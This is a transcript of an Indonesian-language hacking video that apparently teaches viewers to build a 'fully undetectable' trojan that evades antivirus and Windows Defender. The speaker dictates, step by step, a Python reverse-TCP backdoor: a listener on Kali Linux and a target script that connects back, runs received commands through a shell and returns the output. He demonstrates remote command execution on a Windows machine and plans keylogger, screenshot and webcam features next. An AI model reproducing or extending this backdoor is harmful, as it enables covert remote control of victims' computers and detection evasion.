Kita masih membahas tentang Trojan, bagaimana cara kita bisa membuat Trojan yang FUD, yang fully undetectable, yang tidak bisa dideteksi oleh antipirus ataupun oleh Microsoft Security dan Windows Defender. Kita sudah mencoba sebelumnya, mencoba memberikan berbagai macam opsi pada Trojan yang kita buat di MSF Venom, serta mengedit binary atau hex value-nya, namun tetap saja belum bisa membypass antivirus dan Microsoft Security, walaupun sudah bisa membypass Windows Defender, tapi itu masih belum cukup. Sebenarnya MSF Venom ini bukan satu-satunya tool yang bisa kita gunakan untuk membuat Trojan, ada juga tool yang lain, yang juga banyak digunakan, yaitu seperti Veil dan juga Defet Red. Katanya Defet Red ini bisa membuat Trojan yang FUD, atau fully undetectable. Tapi saya sudah mencobanya sendiri, hasilnya tetap saja sama dengan Trojan yang kita buat dengan MSF Venom, masih tetap tidak bisa melewati antivirus dan Microsoft Security. Oke, jadi tidak ada gunanya, saya membuat tutorial menggunakan tool tersebut, jika hasilnya sama saja dengan MSF Venom. Oke, lalu, apa langkah selanjutnya? Bagaimana cara kita bisa membuat Trojan yang FUD, yang fully undetectable? Ya, salah satu cara terbaiknya adalah dengan cara main coding-nya sendiri. Ya, kita harus membuatnya sendiri dari nol, menggunakan bahasa pemrograman. Kita buat Trojan yang brand new, yang benar-benar fresh, yang kita buat dengan logika kita sendiri, dengan menggunakan bahasa pemrograman. Jadi, tidak akan bisa dideteksi. Oke, ya, kita bisa menggunakan bahasa Python, bahasa C, apa C Sharp, Java, itu adalah bahasa-bahasa yang paling sering digunakan untuk membuat virus dan Trojan. Oke, dan kita akan mencoba membuatnya dengan bahasa Python. Dan jika Trojan yang kita buat dengan Python nanti masih bisa dideteksi, kita akan coba membuatnya dengan bahasa C. Oke, ya, karena biasanya Trojan yang dibuat dengan bahasa C itu sangat sulit untuk dideteksi oleh antivirus dan Microsoft Security. Oke, kita akan mulai dengan membuat Trojan dengan bahasa C. Pertama, jika kalian masih ingat, kita sudah membuat shared folder sebelumnya, yaitu folder yang bisa kita akses baik dari Kali Linux di VirtualBox ataupun dari Windows Physical kita, Windows Physical-nya. Ya, yang saya buat namanya adalah VVox Folders. Sebelumnya saya simpan di My Documents, sekarang saya sudah membuat yang baru di desktop. Oke, jika kalian ingin membuat di desktop seperti saya ini, ya, kalian lihat saja tutorialnya di video sebelumnya. Saya lupa video yang keberapa ya. Cara membuat shared folder. Oke, setelah kalian membuat shared folder, kemudian folder ini kalian langsung drag ke salah satu text editor favorit kalian. Oke, ya, misalnya Sublime Text, PyCharm, atau Visual Studio. Oke, ya, saya lebih suka yang simple seperti Sublime Text. Saya akan drag ke sini. Oke, nah sekarang folder, VVox Foldernya sudah terbuka di Sublime Text. dan kita akan membuat dua buah file di sini. Pertama, file untuk server yang akan kita jalankan di Kali Linux sebagai server, karena kita membuat reverse TCP Connection. Jadi, Kali Linux-nya akan dijadikan sebagai server. Dan file yang kedua adalah file yang akan kita jalankan di target mesin, yang disebut dengan Backdoor. Oke, nah di sini kita akan klik kanan di foldernya, kemudian pilih New File. Kita langsung tekan Ctrl S untuk menyimpan. Kita beri nama server. Ya, boleh server, boleh juga beri nama hacker. Jika membingungkan, beri saja nama hacker. Ya, nama hacker ini artinya kita jalankan di komputer yang kita gunakan untuk menghack. Ya, dalam hal ini adalah Kali Linux. Jadi, hacker.py. Tekan save. Atau, kalian juga bisa memberi namanya server. Kemudian, klik kanan lagi di folder yang tadi lagi. Kemudian pilih lagi New File. Oke, kemudian Ctrl S lagi. Kemudian buat namanya target. Ya, bisa kalian beri nama target.py ataupun backdoor.py. Oke, akan enter. Oke, selanjutnya kita akan langsung memulai coding. Dua buah file ini. Sekaligus ya, secara bersamaan. Oke, pertama kita mulai dengan mengkoding file untuk hacker.py. Oke. Kita akan membuka TCP connection. Reverse TCP connection. Ya, untuk membuat koneksi kepada target mesin, kita membutuhkan library socket yang ada di Python. Import socket. Setelah itu kita buat sebuah variable. Kita beri nama sock, misalnya. Kemudian kita ketik socket.socket. Di dalam kurungnya kita ketik socket.af.inet, koma, kemudian socket.sockstream. Ya, socket.sockstream ini kita gunakan untuk membuat reverse connection atau reverse TCP connection. Oke, kemudian di bawahnya kita ketik sock.bind. Jadi, di sini kita akan mengkonekkan IP address dari Kali Linux kita. Saya belum melihat IP address dari Kali Linux saya. Mungkin saya cek saja di sini. IP address dari Windows physicalnya. IP config. Oke, 192.168.218.136. Ini artinya, Kali Linux saya adalah 192.168.218.218.212. Oke, 218.212. 192.168.218.218.212. Oke, kemudian kita buka sebuah port. Misalnya port 999. Seperti yang kita gunakan ketika membuat trojan di MSF Venom. Oke, setelah kita hubungkan IP address dan port yang ada pada Kali Linux kita. Kemudian kita akan memprint, misalnya menunggu koneksi. Oke. Ya, yang kita buat ini adalah sebuah listener ya. Ketika file Python yang di target mesin ini dijalankan, nanti akan terhubung ke listener. Oke. Sama seperti kita membuka listener pada Metasploit. Yang kita gunakan adalah exploit multi-handler. Nah, sekarang tujuannya sama dengan itu. Kita membuat sebuah listener. Ya, karena kita membuat sebuah listener, makanya kita ketik di sini shock.listen. .listen. Ya, dalamnya kita buat targetnya satu ya. Kita bisa membuat targetnya lebih dari satu jika kita ingin... Jika targetnya ada lebih dari satu disitu. Bisa dua, bisa tiga, dan seterusnya. Oke. Setelah kita mendengar koneksi, dan jika koneksinya telah tersambung, maka kita akan membuat sebuah variable. Kita beri nama koneksi misalnya, dalam bahasa Indonesia saja ya. Kemudian kita ketik shock.accept. Oke. Kemudian kita buat dua buah variable dari hasil shock.accept itu. Yang pertama kita buat target. target sama dengan kita ambil value dari koneksi, value yang pertama, 0. Kemudian kita buat variable IP, kita ambil dari koneksi, value koneksi yang kedua, yaitu index pertama. Oke. Kemudian kita akan memprint targetnya. Setelah kita print target, kita bisa memprint terhubung ya. Kita bisa print terhubung misalnya ke, kemudian kita masukkan IP address dari target. Oke. String IP. Ya, ini adalah IP address dari targetnya ya. Dalam hal ini adalah IP address dari Windows 11 yang saya gunakan ini. Ya, ini kita beri F sini sebagai tanda F string. Ya, kita cukup sampai di sini dulu mengkoding untuk hikernya. Kita akan lanjutkan ke target.py. Ya, di target.py ini kita juga masih mengimport socket. Import socket, logikanya masih sama, kita buat variable sock, tapi mungkin namanya kita buat saja sc, biar tidak sama dari yang hacker.py. Sama seperti tadi, socket.socket, kemudian socket.af.inet, socket.sock.stream. Oke, .sock.stream. Nah, di sini bukan bind lagi, tapi di sini connect ya. sc.connect. Yang kita connectkan adalah IP addressnya tadi, 218.212, kemudian 99.99 portnya. Oke, nah sekarang kita langsung bisa mencoba melihat apakah bisa terkoneksi atau tidak. Oke, ya karena ini kita buat dalam folder set folder, maka file ini juga bisa kita buka di kali Linux. Setelah itu, kita akan jalankan hacker.py ini di kali Linux, kemudian kita jalankan file target ini di sini, di Windows. Kita akan buka kali Linux, di kali Linux ini kita buka folder set foldernya, open folder, pilih sf pbox folder ini, dan kita bisa lihat di sini ada file yang kita buat tadi. Oke, kita akan buka terminal di sini, klik kanan, kemudian open terminal here. Oke, kita jalankan file hacker di sini ya, hacker.py. Oke, untuk menjalankan kita ketik Python 3, kemudian hacker.py, kemudian tekan enter, ya sedang menunggu koneksi. Oke, kemudian kita jalankan yang di Windows ini file yang target.py. Oke, yang di kali Linux tadi adalah hacker.py, yang di Windows adalah target.py. Kita akan jalankan, ini saya kecilkan saja. Oke, untuk menjalankan, jika menggunakan sebelum tag, tekan ctrl B. Oke, ctrl B. Oke, ada kesalahan, socket.sockstream ini salah, kita akan lihat. Oh, ternyata di sini ada titik ya. Oke, ada kelebihan titik di sini. Oke, sekarang kita akan jalankan lagi. Ya, di sini masih menunggu koneksi. Kita ctrl B di sini. Dan kita lihat di sini, terhubung ke 192.98.218.136 adalah IP address dari Windows 11 saya tadi, pada port 1881. Artinya kita sudah terhubung antara Linux dan Windows 11. Oke, langkah pertama kita sudah selesai menghubungkan target mesin. Kemudian kita akan lanjutkan langkah kedua. Langkah kedua adalah kita akan membuat coding, bagaimana cara kita bisa memperoleh sel dari target mesin. Dengan memperoleh sel, kita akan bisa mengendalikan target mesin, seperti meter-preter yang kita gunakan sebelumnya. Oke, selanjutnya kita akan besarkan lagi yang ini. Kita kembali ke Windows, melanjutkan codingnya. Ya, pada hacker.py ini kita akan buat sebuah fungsi. Oke, di bawah ini kita buat sebuah fungsi. Kita beri nama fungsi komunikasi cell. Dev, komunikasi cell. Jadi kita akan berikan perintah melalui kali Linux. Kemudian perintah yang kita berikan itu akan dieksekusi di Windows. Kemudian hasil eksekusinya akan dikirim kembali ke kali Linux, sehingga kita bisa melihat hasilnya. Oke, jadi artinya kita melakukan komunikasi antar cell. Kita buat komunikasi cell. Kemudian kita akan menggunakan loop, while true. Ya, kita akan buat sebuah variabel perintah. Oke, jadi perintah apa yang kita inginkan, nanti kita kirimkan ke target mesinnya. Dengan menggunakan input. Input. Ya, misalnya kita buat di sini. Ya, karena Linux saya namanya Rambo. Kita buat saja di sini Rambo Priter. Ya, seperti meter priter ya. Ini Rambo Priter. Oke. Rambo Priter. Nah, setelah itu kita akan membuat sebuah data, variabel data. Nah, untuk data ini kita akan gunakan library JSON. Di sini kita import JSON di atasnya. Import JSON. Oke. Kita lanjutkan. Di bawahnya JSON.dump. Itu fungsi dalam JSON. Kita akan meng-dump perintahnya. Oke. Dump perintah. Kemudian kita kirimkan perintahnya ke target mesin. Jadi, target.send. Oke. Data.encode. Karena kita mengirim, jadi kita harus melakukan encoding ya. Karena datanya dalam bentuk byte. Jadi tidak bisa langsung kita kirim data mentahnya saja. Seperti ini. Harus ada encodernya. Jadi kita encode seperti ini. Data.encode. Oke. Target.send ini adalah sebuah fungsi yang ada dalam soket ya. Jadi send. Kita bisa melakukan send. Bisa juga receive. Oke. Kalau untuk mengirim, kita gunakan send. Kemudian di bawahnya kita buat sebuah variable misalnya hasil. Sama dengan hasil ini artinya kita menerima data ya. Kita akan membuat sebuah fungsi lagi untuk hasil ini. Mungkin kita belum lanjutkan. Kita buat fungsi baru. Oke. Mungkin di atasnya saja. Dev. Kita akan buat fungsi data diterima. Oke. Data diterima. Kemudian di dalamnya kita buat variable data lagi. Kita kosongkan saja value-nya. Kemudian kita buat looping. Kita buat while loop. While. True. Oke. Kita akan menggunakan try. Supaya kita bisa mengendalikan error. Data semenangan data ditambah. Nah disini kita akan menerima data. Jadi target menggunakan fungsi receive. Untuk menerima data ya. Receive. Untuk menerima data kita harus menentukan jumlah data yang ingin kita terima. Misalnya 1024 byte. Kemudian jika kita menerima datanya. Datanya harus kita decode. Jika mengirim harus kita encode. Seperti di bawah ini. Dan menerima harus kita decode. Dot decode. Kemudian kita strip saja. Strip atau R strip. Biar tidak ada special character yang dijalankan dengan menggunakan R strip. Kemudian kita akan mereturn di bawahnya. Return. Kita gunakan json.loads data. Oke. Nah untuk menjalankan fungsi data diterima ini. Kita pergi ke sini. Ke bawah. Oke. Kita buat variable hasil tadi. Hasil sama dengan data diterima. Kita masukkan nama fungsi di atas. Data diterima. Kemudian kita print apa hasilnya ya. Variable hasilnya kita print. Oke. Selanjutnya kita akan menuju ke file target.py. Ya ini adalah file hacker.py. Kemudian kita ke target.py. Di target.py ini kita juga membuat sebuah fungsi. Yaitu menerima perintah. Ya. Karena di sini tadi kita mengirim perintah. Oke. Kita lihat di sini kita mengirim. Oke. Mengirim perintah. Kemudian di sini kita menerima perintah. Oke. Kita buat fungsi dev. Menerima perintah. Oke. Untuk menerima perintah. Kita buat seperti tadi. Oke. Kemudian kita tick while true. Kemudian try. Oh ya. Di try di sini ada yang lupa. Kita lupa membuat accept-nya ya. Oke. Accept. Ya. Kalian buka lagi hacker.py. Tambah di sini accept. Accept value error. Value error. Jika terjadi kesalahan value. Maka kita akan melanjutkan. Continue. Jadi koneksinya akan tetap berjalan. Jadi continue saja ya. Ya. Di sini. Kita ketik sama seperti tadi. Data sama dengan data. Ditambah. Tapi bedanya di sini kita gunakan sc. Sedangkan di hacker.py ini kita gunakan target ya. Target.receive. Nah di sini kita gunakan sc.receive. Oke. sc.receive. Ya sc yang ini. Preble sc. sc.receive sama seperti itu. 1024. 1.024. Dot decode. Oke. Dot decode. Dot r strip. Oke. Setelahnya. Return. JSON. Dot loads. Data. Kemudian accept. Value error. Oke. Continue. Oke. Setelah kita membuat fungsi menerima perintah tersebut. Kita akan buat satu fungsi lagi untuk menjalankan perintah. Oke. Kita buat fungsi di bawahnya. Def. Ya setelah kita terima pesan perintah yang dikirimkan oleh hacker tersebut. Kita akan jalankan perintahnya. Akan mengeksekusi perintahnya. Oke. Kita buat nama fungsinya. Jalankan. Perintah. Oke. Kita jalankan perintah di dalam loop. Di dalam loop. While true. Kemudian kita buat variable perintah. Sama dengan. Ya. Variable perintah ini. Value-nya kita ambil dari menerima perintah. Data yang kita terima dari hacker.py tadi. Akan kita jalankan di dalam variable perintah. Kita masukkan ke dalam variable perintah. Jadi disini kita masukkan fungsi menerima perintah. Ya kemudian perintahnya kita execute. Ya. Kita buat variable execute. Misalnya. Ya untuk mengeksekute perintahnya ini kita harus. Apa. Mengeimport sebuah library lagi. Yaitu library yang disebut dengan subprocess. Oke. Import subprocess. Kemudian. From subprocess. Import pipe. Pipe. Oke. Kemudian kita lanjutkan di variable execute. Di variable execute ini kita ketik subprocess. Oke. Oke. Subprocess. Popen. Ya. Popen ini artinya proses open. Oke. Ini kita enter saja. Karena disini di dalamnya banyak value yang akan kita ketik. Ya. Kita akan ketik di bawahnya. Disini saja misalnya. Oke. Disini. Yang pertama kita masukkan variable perintah ke dalamnya. Perintah yang akan kita execute. Kemudian koma. Oke. Kemudian kita enter. Kemudian kita nyalakan cell-nya. Cell sama dengan true. Di bawahnya. Kita ketik std out. Oke. Std out-nya. Kita gunakan pipe yang sudah kita import di atas. Dari subprocess. Kemudian std error-nya juga kita masukkan disini. Std air. Juga sama dengan pipe. Pipe. Kemudian jangan lupa std in-nya. Oke. Std in. Juga pipe. Oke. Mungkin itu saja. Ya. Ini terlalu ke bawah. Keser ke atas. Oke. Oke. Setelah itu. Di bawah variable execute itu. Kita buat variable data. Nah datanya ini adalah. Kita buat variable execute-nya disini. Kita akan mengambil standard out-nya. std out-nya dari execute. Oke. std out. Read. Kita akan membacanya supaya bisa di-interpret nanti. Oke. Kemudian kita tambah dengan std error. execute. std error. . Read. Oke. std out-std error-nya kita simpan ke dalam variable data yang sudah kita baca. Kemudian datanya kita decode. Oke. Data sama dengan data.decode. Oke. Selanjutnya kita akan membuat variable output. output sama dengan json.dump sama seperti yang di-hacker tadi ya. Dump. Kemudian yang kita dump itu adalah datanya. Data. Baru kita kirim ke hackernya. Supaya bisa ditampilkan di cell hackernya. Oke. Jadi kita ketik disini sc.send output.encode. Jika kita mengirim kita akan melakukan encoding sedangkan menerima kita menggunakan decode. Oke. Mungkin kita langsung bisa mencobanya. Kita akan simpan dulu. Save. Ctrl S. Ini juga Ctrl S. Oke. Kita jalankan hacker.py-nya di kali linux. Kemudian kita jalankan target.py-nya di sini. Oke. Di Windows. Oke. Kita akan buka lagi kali linux-nya. Oke. Kita ketik lagi python3 hacker.py. Tekan enter. .dumps perintah. Oke. Ternyata ada kesalahan. Di mana itu? .dumps. Ya di sini. JSON ya. Kenapa bisa hilang di situ? Oke. Save saja. Ya kita ulang lagi di sini. Oke. Menunggu koneksi. Kemudian kita jalankan target.py-nya. Ctrl B. Dan kita lihat terhubung. Oke. Terhubung ke. Hmm. Tetapi cell-nya belum berjalan. Oke. Oh ya. Kita belum menjalankan fungsi dari komunikasi cell. Oke. Oke. Di sini kita jalankan. Komunikasi cell. Kemudian tanda kurung. Oke. Baru bisa. Ya kita akan ulang lagi di sini. Python3 hacker.py. Tekan enter. Menunggu koneksi. Kemudian kita jalankan lagi target.py. Ctrl B. Ya. Kita lihat di sini. Kita sudah memiliki sebuah cell yang terbuka. Yang siap untuk kita gunakan untuk menjalankan perintah. Oke. Misalnya kita ketik ipconfig. Bukan enter. Dan ternyata masih tetap belum bisa. Oke. Apa kesalahannya? Kita akan coba ulang lagi. Python. Python3 hacker.py. Tekan enter. Jalankan ini. Ya. Kita coba komen yang lain. Misalnya. Dir. Oh ya. Ini belum bisa. Mungkin ada kesalahan encoding atau decoding-nya. Saya akan cek dulu ya. Oke. Oke. Tadi saya sudah cek script-nya. Saya perhatikan ternyata ada tiga kesalahan ya. Oke. Kita langsung perbaiki saja. Yang pertama kita belum mengimport json di sini. Itu di target.py ya. Kita import json. Import json. Dan setelah itu ada lagi kesalahan pengetikan yaitu sen. Seharusnya sen pakai D ya. Sen. Oke. Kalian perbaiki. Kemudian. Ini fungsi jalankan perintah ini juga belum kita jalankan. Nah di bawahnya kita ketik jalankan perintah. Oke. Save. Control S. Nah sekarang kita jalankan lagi. Python. Ups. Bukan di situ. Di sini. Python tree hacker.py. Bukan enter. Oke. Menunggu koneksi. Kemudian di sini kita control B target.py nya. Dan kita sudah terhubung. Kita lihat di sini sudah terhubung. Kemudian di bawahnya ada cell. Oke. Kita bisa menjalankan perintah di cell nya. Misalnya. DIR. Oke. Kita bisa melihat DIR nya. Sama seperti pada cell Windows ya. Kita jalankan IP config nya. Oke. Kita bisa melihat IP address nya. Misalnya who am I. Ya. Who am I. User. Kita sebagai user. Apalagi komen lain ya. Misalnya CD. Ya. Kita berada di folder ini. Kemudian. Misalnya. Komen yang lain. Versi. Oke. Ini adalah versi Windows nya. Ya. Windows nya Windows 11. Tapi ini versi. Masih versi 10 ya. Kemudian volume nya. Ya. Kita bisa menjalankan semua komen yang ada di cell Windows. Di Kali Linux kita ini. Karena kita sudah berhasil mengakses nya dengan menggunakan socket. Oke. Dan ini adalah masih trojan yang dasar. Masih backdoor yang dasar yang kita buat. Kita akan terus mengembangkan backdoor ini. Sehingga nanti kita bisa menjalankan screenshot. Menjalankan keylogger. Dan juga menjalankan webcam. Oke. Dan kita akan lanjutkan di video selanjutnya. Dan kita akan terus mengembangkan. Dan kita akan terus mengembangkan. Dan kita akan terus mengembangkan. Terima kasih.